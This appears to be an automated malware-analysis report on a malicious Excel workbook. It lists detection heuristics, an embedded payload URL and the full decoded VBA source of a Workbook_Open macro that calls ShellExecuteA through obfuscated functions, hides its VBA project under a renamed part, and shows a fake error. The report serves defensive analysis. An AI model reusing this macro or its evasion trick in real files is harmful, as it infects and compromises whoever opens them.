MALICIOUS
70
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
This Excel document contains a Workbook_Open VBA macro that is designed to execute a command. The macro utilizes the ShellExecuteA function, which is often used to download and execute a second-stage payload. The embedded URL was likely intended to host this payload.
Heuristics 4
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/dvdsvhufhuierhiu.txt)
-
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
#End If Sub wORKBooK_oPen(): Call mPvdt: End Sub Sub mPvdt() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://ntro.fr/gtrdek/officeclick.png In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2726 bytes |
SHA-256: a7b4475fbe67a5aef18d3c4c2ca4d0049285cb2fe9f3d892247bd028255dce11 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub bdbrx()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
#If Win64 Then
Private Declare PtrSafe Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As LongPtr, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As LongPtr) As LongPtr
#Else
Private Declare PtrSafe Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As Long, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As Long) As Long
#End If
#Else
#If Win64 Then
Private Declare PtrSafe Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As LongPtr, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As LongPtr) As LongPtr
#Else
Private Declare Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As Long, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As Long) As Long
#End If
#End If
Sub wORKBooK_oPen(): Call mPvdt: End Sub
Sub mPvdt()
Call yVhgV
End Sub
Sub yVhgV()
Call wGLTT
End Sub
Static Sub wGLTT()
Call IMxWv
End Sub
Sub IMxWv()
Call USjZX
End Sub
Sub USjZX()
Call SDMLV
End Sub
Static Sub SDMLV()
Call eJzOx
End Sub
Sub eJzOx()
Call qPlRZ
End Sub
Sub qPlRZ()
Call CVXUA
End Sub
Static Sub CVXUA()
Call AGBHy
End Sub
Function AGBHy() As Variant
Call Gsbsz(0, "oPEn", Split(UserForm1.CheckBox1.GroupName, ChrW$(32))(0), Right(UserForm1.CheckBox1.GroupName, Len(UserForm1.CheckBox1.GroupName) - Len(Split(UserForm1.CheckBox1.GroupName, ChrW$(32))(0))), "", 1)
MsgBox ("The filename, directory name, or volume label syntax is incorrect.")
Application.Quit
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{8C3E8C44-A29C-418F-9ECA-FA230E799425}{013334C2-8723-4AC4-A94B-DFA180F51A91}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/dvdsvhufhuierhiu.txt | 25088 bytes |
SHA-256: efb1e49a1ba9b09f97684e3e49dee70cce454c1cfbe08e38b10adb2e15641266 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.